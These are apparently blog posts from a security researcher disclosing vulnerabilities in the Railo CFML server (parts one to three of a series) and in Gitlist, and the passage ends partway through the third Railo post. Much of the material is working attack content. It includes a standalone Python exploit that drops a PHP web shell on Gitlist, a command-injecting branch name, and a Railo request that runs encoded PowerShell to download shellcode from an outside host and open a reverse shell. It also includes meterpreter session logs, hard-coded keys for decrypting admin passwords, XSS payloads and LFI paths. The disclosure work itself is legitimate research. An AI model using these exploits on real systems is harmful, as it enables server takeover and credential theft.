A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:

<cfcookie expires="#DateAdd(form.rememberMe,1,now())#" name="railo_admin_pw_#ad#" value="#Encrypt(form["login_password"&ad],cookieKey,"CFMX_COMPAT","hex")#">

That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric key security is dependant upon the secrecy of this shared key.

To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):

<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
    <cfset fromCookie=true>
    <cftry>
        <cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
        <cfcatch></cfcatch>
    </cftry>
</cfif>

For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:

<cfset tmp=Decrypt("6802AABFAA87A7", "sdfsdf789sdfsd", "CFMX_COMPAT", "hex")>
<cfdump var="#tmp#">

This would dump my plaintext password (which, in this case, is "default"). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT.

Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:

<cfset session["password"&request.adminType]=form["login_password"&request.adminType]>

In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:

<cfdump var="#session#">

We then set the template handler to this file:

If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:

XSS

XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?

Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.

Post-authentication search:

Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.

How about stored XSS?

A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.

Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:

  public static final String[] invalids=new String[]{
        "object", "embed", "script", "applet", "meta", "iframe"
    };

They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:

if(compareTagName(tagName)) {
            if(sb==null) {
                sb=new StringBuffer();
                last=0;
            }
            sb.append(str.substring(last,index+1));
            sb.append("invalidTag");
            last=endIndex;
        }

It doesn’t take much to evade this filter, as I’ve already described.

CSRF kind of fits in here, so how about CSRF? Fortunately for users, and unfortunately for pentesters, there's not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:

In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.

Deploying

Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:

$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
 [2014-05-01 10:04PM] Servers' OS hinted at windows
 [2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
 [2014-05-01 10:04PM] Server hinted at 'railo'
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-05-01 10:04PM] Matched 3 fingerprints for service railo
 [2014-05-01 10:04PM]   Railo Server (version 4.1)
 [2014-05-01 10:04PM]   Railo Server Administrator (version 4.1)
 [2014-05-01 10:04PM]   Railo Web Administrator (version 4.1)
 [2014-05-01 10:04PM] Fingerprinting completed.
 [2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
 [2014-05-01 10:04PM] Creating scheduled task...
 [2014-05-01 10:04PM] Task cmd.cfml created, invoking...
 [2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
 [2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
 [2014-05-01 10:04PM] Cleaning up...
 [2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM

This works almost identically to the Coldfusion scheduler, and should not be surprising.

One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.

Railo allows extensions to be uploaded directly to the server, found here:

Developing a plugin is sort of confusing and not exactly clear from their provided Github documentation; however, the simplest way to do this is to grab a pre-existing package and simply replace one of the functions with a shell.

That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.

gitlist - commit to rce

29 June 2014 at 22:00

Gitlist is a fantastic repository viewer for Git; it's essentially your own private Github without all the social networking and glitzy features. I've got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:

Oops! sh: 1: Syntax error: EOF in backquote substitution

I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.

The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:

$hash = $this->getClient()->run($this, "log --pretty=\"%T\" --max-count=1 $branch");

This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.

The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):

  1. Cannot begin with .
  2. Cannot contain a double dot (..)
  3. Cannot contain ASCII control characters or any of ?, [, ], ~, ^, :
  4. Cannot end with /
  5. Cannot end with .lock
  6. Cannot contain a backslash
  7. Cannot contain a space

With these restrictions in mind, we can begin crafting our payload.

My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:

cd /var/www/gitlist
mkdir cache
chmod 777 cache

This is perfect; we have a reliable location with 777 permissions and it’s accessible from the web root (/gitlist/cache/my_shell.php). Second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:

# git checkout -b "|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"|base64\$IFS-d>/var/www/gitlist/cache/x"

In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to stand in for our spaces, echo the base64'd shell into the base64 utility for decoding, and then pipe the result into our payload location.
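
To reuse the trick with an arbitrary PHP payload, a small generator sketch (the cache path is the 777 directory from INSTALL.md; the base64 below matches the branch name above):

import base64

php = "<?system($_REQUEST['x']);?>\n"
b64 = base64.b64encode(php)
branch = '|echo$IFS"%s"|base64$IFS-d>/var/www/gitlist/cache/x' % b64
# escape $ and " so the shell passes the branch name through literally
print 'git checkout -b "%s"' % branch.replace('$', '\\$').replace('"', '\\"')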

And it works flawlessly.

You might say, "Hey, if you have commit access it's game over", but I've seen several instances where this is not the case. Commit access does not necessarily equate to shell access.

The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:

$blames = $repository->getBlame("$branch -- \"$file\"");

Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:

http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

And what do you know?

Curiosity quickly overcame me, and I attempted another vector:

Faster my fingers flew:

It’s terrifyingly clear that everything is an RCE. I developed a rough PoC to drop a web shell on the system. A test run of this is below:

root@droot:~/exploits# python gitlist_rce.py http://192.168.1.67/gitlist/graymatter
[!] Using cache location /var/www/gitlist/cache
[!] Shell dropped; go hit http://192.168.1.67/gitlist/cache/x.php?cmd=ls
root@droot:~/exploits# curl http://192.168.1.67/gitlist/cache/x.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@droot:~/exploits# 

I’ve also developed a Metasploit module for this issue, which I’ll be submitting a PR for soon. A run of it:

msf exploit(gitlist_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.6:4444 
[*] Injecting payload...
[*] Executing payload..
[*] Sending stage (39848 bytes) to 192.168.1.67
[*] Meterpreter session 9 opened (192.168.1.6:4444 -> 192.168.1.67:34241) at 2014-06-21 23:07:01 -0600

meterpreter > sysinfo
Computer    : bryan-VirtualBox
OS          : Linux bryan-VirtualBox 3.2.0-63-generic #95-Ubuntu SMP Thu May 15 23:06:36 UTC 2014 i686
Meterpreter : php/php
meterpreter > 

Source for the standalone Python exploit can be found below.

from commands import getoutput
import urllib
import sys

""" 
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Tested on: Debian 7
More information: 
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

railo security - part two - post-authentication rce

24 July 2014 at 21:10

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, Railo, like ColdFusion, has a task scheduler that allows authenticated users to write local files. While that feature is the standard way to shell a Railo box, it may not always work; in the event of stringent firewall rules or irregular file permissions, or if you'd simply prefer not to make remote connections, the techniques explored in this post will serve you well.

PHP has an interesting, ahem, feature where it writes session information out to a temporary file in a designated path. If accessible to an attacker, this file can be used to inject PHP data via multiple vectors, such as a User-Agent or some function of the application itself. Railo does much the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP, however, the name of the file is not simply the session ID, but rather a quasi-unique value generated from a mixture of pseudo-random and predictable/leaked information. I'll dive into this in a bit.

When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1

The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:

{'fullscreen':'true','contentwidth':'1267','favorites':{'server.request':''}}

The next question is then obvious: what if we inject something malicious as a favorite?

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>#output#</pre></cfoutput> HTTP/1.1

Our session file will then read:

{'fullscreen':'true','contentwidth':'1267','favorites':{'<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>##output##</pre></cfoutput>':'','server.charset':''}}

Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.

We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.

I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1

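For reference, the -Enc argument is just base64 over the UTF-16LE bytes of the command; a minimal sketch that should reproduce the blob injected above:

import base64

cmd = ("iex (New-Object Net.WebClient).DownloadString("
       "'http://192.168.1.6:8000/Invoke-Shellcode.ps1')")
# PowerShell's -Enc flag expects base64 of the UTF-16LE-encoded command
print 'PowerShell.exe -Exec ByPass -Nol -Enc ' + base64.b64encode(cmd.encode('utf-16-le'))
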
Once injected, we hit our session page and pop a shell:

payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600

meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Because I’m using Powershell, this method won’t work in Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).

The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:

':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'

Note that we’re writing out to the start of web root and that our output file is a CFM; this is a requirement as the web server won’t serve up flat files or txt’s.

Great, we’ve verfied this works. Now, how to actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.

We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root, that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.

When a favorite is saved, internal.savedata.cfm is invoked and searches through the given list for the function we're performing:

<cfif listFind("addfavorite,removefavorite", url.action2) and structKeyExists(url, "favorite")>
    <cfset application.adminfunctions[url.action2](url.favorite) />
        <cflocation url="?action=#url.favorite#" addtoken="no" />

This calls down into application.adminfunctions with the specified action and favorite-to-save. Our addfavorite function is as follows:

<cffunction name="addfavorite" returntype="void" output="no">
        <cfargument name="action" type="string" required="yes" />
        <cfset var data = getfavorites() />
        <cfset data[arguments.action] = "" />
        <cfset setdata('favorites', data) />
    </cffunction>

Tunneling yet deeper into the rabbit hole, we move forwards into setdata:

<cffunction name="setdata" returntype="void" output="no">
        <cfargument name="key" type="string" required="yes" />
        <cfargument name="value" type="any" required="yes" />
        <cflock name="setdata_admin" timeout="1" throwontimeout="no">
            <cfset var data = loadData() />
            <cfset data[arguments.key] = arguments.value />
            <cfset writeData() />
        </cflock>
    </cffunction>

This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is "how do we know the filename?", so naturally we need to head into loadData:

 <cffunction name="loadData" access="private" output="no" returntype="any">
        <cfset var dataKey = getDataStoreName() />
            [..snip..]

And yet deeper we move, into getDataStoreName:

<cffunction name="getDataStoreName" access="private" output="no" returntype="string">
        <cfreturn "#request.admintype#-#getrailoid()[request.admintype].id#" />
    </cffunction>

At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.

I’ll skip some of the digging here, but lets fast forward to Admin.java:

 private String getCallerId() throws IOException {
        if(type==TYPE_WEB) {
            return config.getId();
        }

Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:

   @Override
    public String getId() {
        if(id==null){
            id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
        }
        return id;
    }

Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:

public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {

    try {
        if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}

Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:

private static void loadId(ConfigImpl config) {
        Resource res = config.getConfigDir().getRealResource("id");
        String securityKey = null;
        try {
            if (!res.exists()) {
                res.createNewFile();
                IOUtil.write(res, securityKey = UUIDGenerator.getInstance().generateRandomBasedUUID().toString(), SystemUtil.getCharset(), false);
            }
            else {
                securityKey = IOUtil.toString(res, SystemUtil.getCharset());
            }
        }

Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.

The second value we need to calculate is the security token, which is set in ConfigImpl:

public String getSecurityToken() {
        if(securityToken==null){
            try {
                securityToken = Md5.getDigestAsString(getConfigDir().getAbsolutePath());
            }
            catch (IOException e) {
                return null;
            }
        }
        return securityToken;
    }

Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo So let’s see if this works.

We MD5 the directory (20132193c7031326cab946ef86be8c74), then prefix this with the random UUID (securityKey) to finally get:

$ echo -n "3ec59952-b5de-4502-b9d7-e680e5e2071820132193c7031326cab946ef86be8c74" | md5sum
a898c2525c001da402234da94f336d55  -

Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we're seeing on disk.
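
To make the derivation concrete, a minimal sketch of the computation (assuming, per the code above, that the token is the MD5 of the config directory's absolute path and the id is the MD5 of key + token; any difference in trailing separators would change the hash):

import hashlib

def railo_session_file(config_dir, security_key, interface='web'):
    # securityToken = MD5 of the configuration directory's absolute path
    token = hashlib.md5(config_dir).hexdigest()
    # id = MD5(securityKey + securityToken), per ConfigImpl.getId()
    return '%s-%s.cfm' % (interface, hashlib.md5(security_key + token).hexdigest())

# values from the walkthrough above
print railo_session_file(
    r'C:\Documents and Settings\bryan\My Documents\Downloads'
    r'\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo',
    '3ec59952-b5de-4502-b9d7-e680e5e20718')
# -> web-a898c2525c001da402234da94f336d55.cfm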

I mentioned that the config directory is leaked; default Railo is pretty promiscuous:

As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.

There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:

When we then access a non-existant page, we trigger the template and the system returns our file:

By combining these specific vectors and inherent weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn't an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:

I mentioned briefly at the start of this post that there were β€œseveral” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:

Here we’re building an HTML layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. The file is not created once you create the log, but once you select Edit and then Submit for some reason. Here’s the HTML output that’s, by default, stuck into the file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><cfdump var="#session#"></title>
<style type="text/css">
<!--
body, table {font-family: arial,sans-serif; font-size: x-small;}
th {background: #336699; color: #FFFFFF; text-align: left;}
-->
</style>
</head>
<body bgcolor="#FFFFFF" topmargin="6" leftmargin="6">
<hr size="1" noshade>
Log session start time Mon Jun 30 23:06:17 MDT 2014<br>
<br>
<table cellspacing="0" cellpadding="4" border="1" bordercolor="#224466" width="100%">
<tr>
<th>Time</th>
<th>Thread</th>
<th>Level</th>
<th>Category</th>
<th>Message</th>
</tr>
</table>
<br>
</body></html>

Note that our title contains the injected CFML. Here's execution:

Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.

Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:

With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.

Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.

railo security - part three - pre-authentication LFI

23 August 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication LFI
Part four – pre-authentication rce

This post continues our four-part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users to retrieve the administrative plaintext password and log in to the server's administrative interfaces. If you're unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFIs discussed have been implemented as auxiliary modules in clusterd, though they're pretty trivial to exploit on their own.

We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.

A quick run of this in clusterd on Railo 4.0:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
 [2014-05-15 06:25PM] Servers' OS hinted at windows
 [2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:25PM] Server hinted at 'railo'
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
 [2014-05-15 06:25PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:25PM]   Railo Server (version 4.0)
 [2014-05-15 06:25PM]   Railo Server Administrator (version 4.0)
 [2014-05-15 06:25PM]   Railo Web Administrator (version 4.0)
 [2014-05-15 06:25PM] Fingerprinting completed.
 [2014-05-15 06:25PM] Attempting to pull password...
 [2014-05-15 06:25PM] Fetched encrypted password, decrypting...
 [2014-05-15 06:25PM] Decrypted password: default
 [2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM

and on the latest release of Railo, 4.2:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
 [2014-05-15 06:28PM] Servers' OS hinted at windows
 [2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:28PM] Server hinted at 'railo'
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
 [2014-05-15 06:28PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:28PM]   Railo Server (version 4.2)
 [2014-05-15 06:28PM]   Railo Server Administrator (version 4.2)
 [2014-05-15 06:28PM]   Railo Web Administrator (version 4.2)
 [2014-05-15 06:28PM] Fingerprinting completed.
 [2014-05-15 06:28PM] Attempting to pull password...
 [2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
 [2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM

Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 blowfish encrypt the password, and > 4.0 actually hashes it. Here’s the relevant code from Railo (ConfigWebFactory.java):

private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException  {
        Element railoConfiguration = doc.getDocumentElement();

        // password
        String hpw=railoConfiguration.getAttribute("pw");
        if(StringUtil.isEmpty(hpw)) {
            // old password type
            String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
            if (!StringUtil.isEmpty(pwEnc)) {
                String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
                hpw=hash(pwDec);
            }
        }
        if(!StringUtil.isEmpty(hpw))
            config.setPassword(hpw);
        else if (configServer != null) {
            config.setPassword(configServer.getDefaultPassword());
        }

As shown above, they encrypt the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA-256) and use that instead. Note that in > 4.0 the stored value is a hash rather than a reversibly-encrypted password, so we cannot simply decrypt it to use and abuse.

Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…

The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects all versions of Railo, both installed and express:

Using this we cannot pull railo-web.xml.cfm due to it containing XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP Appsec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting; if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFI’s, could be a reliable pre-authentication RCE, but I was unable to get it working.

The third LFI is just as trivial as the first two, and again stems from the endemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:

<cfset path="resources/img/#attributes.src#.cfm">
<cfparam name="application.adminimages" default="#{}#">
<cfif StructKeyExists(application.adminimages,path) and false>
    <cfset str=application.adminimages[path]>
<cfelse>
    <cfsavecontent variable="str" trim><cfinclude template="#path#"></cfsavecontent>
    <cfset application.adminimages[path]=str>
</cfif>

